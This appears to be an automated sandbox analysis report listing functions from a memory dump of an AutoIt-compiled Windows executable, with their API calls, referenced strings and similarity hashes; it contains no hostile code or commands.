Function 001F4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 001F5013
LoadCursorW.USER32(00000000,00007F00), ref: 001F501E
LoadCursorW.USER32(00000000,00007F03), ref: 001F5029
LoadCursorW.USER32(00000000,00007F8B), ref: 001F5034
LoadCursorW.USER32(00000000,00007F01), ref: 001F503F
LoadCursorW.USER32(00000000,00007F81), ref: 001F504A
LoadCursorW.USER32(00000000,00007F88), ref: 001F5055
LoadCursorW.USER32(00000000,00007F80), ref: 001F5060
LoadCursorW.USER32(00000000,00007F86), ref: 001F506B
LoadCursorW.USER32(00000000,00007F83), ref: 001F5076
LoadCursorW.USER32(00000000,00007F85), ref: 001F5081
LoadCursorW.USER32(00000000,00007F82), ref: 001F508C
LoadCursorW.USER32(00000000,00007F84), ref: 001F5097
LoadCursorW.USER32(00000000,00007F04), ref: 001F50A2
LoadCursorW.USER32(00000000,00007F02), ref: 001F50AD
LoadCursorW.USER32(00000000,00007F89), ref: 001F50B8
GetCursorInfo.USER32(?), ref: 001F50C8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 82185221d3a734824b226a552e9c5d02c4432b930f32fda083cf43e40f0327df
Instruction ID: 89d019ce35b6045415c0032e164a9fd34d4786d461ab078b31f7e3aa6ab5e910
Opcode Fuzzy Hash: 82185221d3a734824b226a552e9c5d02c4432b930f32fda083cf43e40f0327df
Instruction Fuzzy Hash: FF3103B1D4831E6ADF509FB68C8996FBFE9FF04750F50452AA60DE7280DB78A5008F91

Function 0020A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0020A259
DestroyWindow.USER32(?,?), ref: 0020A2D3

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0020A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0020A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0020A382
DestroyWindow.USER32(00000000), ref: 0020A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00180000,00000000), ref: 0020A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0020A3F4
GetDesktopWindow.USER32 ref: 0020A40D
GetWindowRect.USER32(00000000), ref: 0020A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0020A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0020A444

Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC

Strings

0, xrefs: 0020A26F
tooltips_class32, xrefs: 0020A346, 0020A3D4

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 571dc24a2482654952add0d795726052af362ded5392e1be9d40d26f86f5e238
Instruction ID: 8d7b39d4379e76066c9f30cd36efffd0ae7b5593301ae05b44325773dc73646b
Opcode Fuzzy Hash: 571dc24a2482654952add0d795726052af362ded5392e1be9d40d26f86f5e238
Instruction Fuzzy Hash: 2571BC74150305AFD725CF28DC48F6A7BEAFB89300F44452CF9858B2A2CBB1E952CB52

Function 00204392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00204424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0020446F

Strings

EXISTS, xrefs: 002044D8
CHECK, xrefs: 0020448F
GETTEXT, xrefs: 002045C2
UNCHECK, xrefs: 0020464B
GETSELECTED, xrefs: 0020457F
COLLAPSE, xrefs: 002044B5
ISCHECKED, xrefs: 002045F2
GETITEMCOUNT, xrefs: 00204551
EXPAND, xrefs: 00204521
GETTOTALCOUNT, xrefs: 00204456
SELECT, xrefs: 00204620

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: c51f3e34695554e5ef3dc7029f21a758ce8f4c13b56e44574cd8a44065f56f1c
Instruction ID: 850b5862932f2191dd8a8c07c8a15bc3e24e05bd1531e860d18bf75896e74071
Opcode Fuzzy Hash: c51f3e34695554e5ef3dc7029f21a758ce8f4c13b56e44574cd8a44065f56f1c
Instruction Fuzzy Hash: A1918FB42103019FCB04FF10C851A6EB7A5AFA6354F088869F8965B3E3DB71ED59CB81

Function 0020B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0020B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,002091C2), ref: 0020B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0020B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0020B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0020B9C3
FreeLibrary.KERNEL32(?), ref: 0020B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0020B9DF
DestroyIcon.USER32(?,?,?,?,?,002091C2), ref: 0020B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0020BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0020BA17

Part of subcall function 001A2EFD: __wcsicmp_l.LIBCMT ref: 001A2F86

Strings

.dll, xrefs: 0020B86D
.icl, xrefs: 0020B82A
.exe, xrefs: 0020B84A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 183d1c08b9be8ba80d04864f54325631d8d866632bd08bbcbed33c7875387c34
Instruction ID: 6318a388275df1aaada15a9a4420e20181689a4d3f14e7b840e5cda15247cf81
Opcode Fuzzy Hash: 183d1c08b9be8ba80d04864f54325631d8d866632bd08bbcbed33c7875387c34
Instruction Fuzzy Hash: 1E612F7195030ABBEB25DF64DC45FBE7BACEB09710F108115F915D60D2DB70AAA0DBA0

Function 001EDC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 001EDCDC
SystemTimeToFileTime.KERNEL32(?,?), ref: 001EDCEC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 001EDCF8
__wsplitpath.LIBCMT ref: 001EDD56
_wcscat.LIBCMT ref: 001EDD6E
_wcscat.LIBCMT ref: 001EDD80
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001EDD95
SetCurrentDirectoryW.KERNEL32(?), ref: 001EDDA9
SetCurrentDirectoryW.KERNEL32(?), ref: 001EDDDB
SetCurrentDirectoryW.KERNEL32(?), ref: 001EDDFC
_wcscpy.LIBCMT ref: 001EDE08
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001EDE47

Strings

*.*, xrefs: 001EDE02

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 4730ed0d2383e1bb90084614c2fdcf5d4e70549f05a545beec295265134219fe
Instruction ID: 090e321b50c5c8fd93bac7e06a9fc77e3f3f6ffc78a57d1c1fcafe3ce7539dd2
Opcode Fuzzy Hash: 4730ed0d2383e1bb90084614c2fdcf5d4e70549f05a545beec295265134219fe
Instruction Fuzzy Hash: 276199761047859FCB10EF60D8449AEB3E8FF99314F04492DF98987251EB31EA45CF92

Function 001E9C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 001E9C7F

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001E9CA0
__swprintf.LIBCMT ref: 001E9CF9
__swprintf.LIBCMT ref: 001E9D12
_wprintf.LIBCMT ref: 001E9DB9
_wprintf.LIBCMT ref: 001E9DD7

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 001E9DB4
^ ERROR , xrefs: 001E9D4E
"%s" (%d) : ==> %s:, xrefs: 001E9DD2
Line %d (File "%s"):, xrefs: 001E9CF3, 001E9D0C
Error: , xrefs: 001E9D81
Incorrect parameters to object property !, xrefs: 001E9D5B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 46add3f0ac3d87c3b6b9c391d9d706b262d84173491a0620b3df5521b291d8a8
Instruction ID: 9e72992ed7b8ba65de634c0cfe75f7117e22f93dfc1583748e6ca5ee880a4e20
Opcode Fuzzy Hash: 46add3f0ac3d87c3b6b9c391d9d706b262d84173491a0620b3df5521b291d8a8
Instruction Fuzzy Hash: 50517C7290061AAACF14FBE0DD46EEEB779AF25304F600165F509720A2EB316F59CF60

Function 001EA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00189837: __itow.LIBCMT ref: 00189862
Part of subcall function 00189837: __swprintf.LIBCMT ref: 001898AC

CharLowerBuffW.USER32(?,?), ref: 001EA3CB
GetDriveTypeW.KERNEL32 ref: 001EA418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001EA4C5

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

Strings

wait, xrefs: 001EA482
closed, xrefs: 001EA3DF, 001EA3E8
type cdaudio alias cd wait, xrefs: 001EA443
open , xrefs: 001EA427
set cd door , xrefs: 001EA466
open, xrefs: 001EA3F2
close, xrefs: 001EA3D1
close cd wait, xrefs: 001EA4B0

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 9322602323d3c1f1407492607b4e36a621f664f44ce3f00166c169a63778ba0a
Instruction ID: ea52d37cdf65b1a2fc9829f90afe167917f9042ba2613f31d66d85056c98c21c
Opcode Fuzzy Hash: 9322602323d3c1f1407492607b4e36a621f664f44ce3f00166c169a63778ba0a
Instruction Fuzzy Hash: 0E516DB51147059FC700EF11C88196EB7E8EFA9718F54886DF89A572A1DB31EE09CF42

Function 001DF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,001BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 001DF8DF
LoadStringW.USER32(00000000,?,001BE029,00000001), ref: 001DF8E8

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,001BE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 001DF90A
LoadStringW.USER32(00000000,?,001BE029,00000001), ref: 001DF90D
__swprintf.LIBCMT ref: 001DF95D
__swprintf.LIBCMT ref: 001DF96E
_wprintf.LIBCMT ref: 001DFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 001DFA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 001DFA12
^ ERROR, xrefs: 001DF9C3
Line %d (File "%s"):, xrefs: 001DF957
Error: , xrefs: 001DF9E5
Line %d:, xrefs: 001DF968

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: f629ceac268452b811ad5fde7443c02b8917f3e3aff7bb7f21c1c158830693ee
Instruction ID: d1fe742f554183a2a0d1466aa1313274e257bbcc86d829f9d7ef3420567e702f
Opcode Fuzzy Hash: f629ceac268452b811ad5fde7443c02b8917f3e3aff7bb7f21c1c158830693ee
Instruction Fuzzy Hash: 7F414072904209AACF14FBE0DD56EEEB778AF25314F600065F506B6192EB31AF49CF61

Function 0020BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00209207,?,?), ref: 0020BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00209207,?,?,00000000,?), ref: 0020BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00209207,?,?,00000000,?), ref: 0020BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00209207,?,?,00000000,?), ref: 0020BA85
GlobalLock.KERNEL32(00000000), ref: 0020BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00209207,?,?,00000000,?), ref: 0020BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0020BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00209207,?,?,00000000,?), ref: 0020BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00209207,?,?,00000000,?), ref: 0020BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00212CAC,?), ref: 0020BAD7
GlobalFree.KERNEL32(00000000), ref: 0020BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0020BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0020BB36
DeleteObject.GDI32(00000000), ref: 0020BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0020BB74

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: fef900fb924be2c6a078972b9941110246f31c186a2312dfcc14eced714668c9
Instruction ID: 184dc0a9cbd716b9cb8af0d35aed9a65fac22e71fa2017bc23cf645f40d822d3
Opcode Fuzzy Hash: fef900fb924be2c6a078972b9941110246f31c186a2312dfcc14eced714668c9
Instruction Fuzzy Hash: 13415775640309EFCB219F65ED8CEAABBB8EB89711F104068F909D72A2D7709D01CB60

Function 001ED899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 001EDA10
_wcscat.LIBCMT ref: 001EDA28
_wcscat.LIBCMT ref: 001EDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001EDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 001EDA63
GetFileAttributesW.KERNEL32(?), ref: 001EDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 001EDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 001EDAA7

Strings

*.*, xrefs: 001EDAE6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: e15aa1ae09d6dc5b314f627479645c298e8daad3d3d9b9062d532ac27ed3eed9
Instruction ID: c60c992f7f1caba4c94ac515b0647aa37801a1cbaea2f1b348c39f7126f37f13
Opcode Fuzzy Hash: e15aa1ae09d6dc5b314f627479645c298e8daad3d3d9b9062d532ac27ed3eed9
Instruction Fuzzy Hash: 4481E4715047819FCB24EF66D845AAEB7E4BF99318F18482EF889CB252E730DD44CB52

Function 0020C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0020C1FC
GetFocus.USER32 ref: 0020C20C
GetDlgCtrlID.USER32(00000000), ref: 0020C217
_memset.LIBCMT ref: 0020C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0020C36D
GetMenuItemCount.USER32(?), ref: 0020C38D
GetMenuItemID.USER32(?,00000000), ref: 0020C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0020C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0020C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0020C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0020C489

Strings

0, xrefs: 0020C33A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: e047622ed743d3739901575925d72bf4839fed2827d598623e253d9d4e9a7b6c
Instruction ID: 8ad6be8e50f1ec002b3f5d5db01daedb9ade10a0cfe99803ba68461c7ed3dad3
Opcode Fuzzy Hash: e047622ed743d3739901575925d72bf4839fed2827d598623e253d9d4e9a7b6c
Instruction Fuzzy Hash: 5981B0B02283129FD720DF54D884A6BBBE8FB88314F204A2EF99597292C770D915CB52

Function 001F731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 001F738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001F739B
CreateCompatibleDC.GDI32(?), ref: 001F73A7
SelectObject.GDI32(00000000,?), ref: 001F73B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 001F7408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 001F7444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 001F7468
SelectObject.GDI32(00000006,?), ref: 001F7470
DeleteObject.GDI32(?), ref: 001F7479
DeleteDC.GDI32(00000006), ref: 001F7480
ReleaseDC.USER32(00000000,?), ref: 001F748B

Strings

(, xrefs: 001F7410

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 68d72881e49734f14e561682efa510e2e060b72861bc812e6d077b9c775c860d
Instruction ID: 8a61b03595686ac3e810681945173ff09cc58b01e7a6007e3b4ab76ef54654a4
Opcode Fuzzy Hash: 68d72881e49734f14e561682efa510e2e060b72861bc812e6d077b9c775c860d
Instruction Fuzzy Hash: 4F514875904309EFCB25CFA8DC88EAEBBB9FF48310F14842DFA5A97251D771A9408B50

Function 00186A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 001A0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00186B0C,?,00008000), ref: 001A0973

Part of subcall function 00184750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00184743,?,?,001837AE,?), ref: 00184770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00186BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00186CFA

Part of subcall function 0018586D: _wcscpy.LIBCMT ref: 001858A5

Part of subcall function 001A363D: _iswctype.LIBCMT ref: 001A3645

Strings

EA06, xrefs: 001BE452
#include depth exceeded. Make sure there are no recursive includes, xrefs: 001BE421
Bad directive syntax error, xrefs: 001BE79D
Unterminated string, xrefs: 001BE7E4
AU3!, xrefs: 00186B61
Error opening the file, xrefs: 001BE43D, 001BE4B8
>>>AUTOIT SCRIPT<<<, xrefs: 001BE496

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
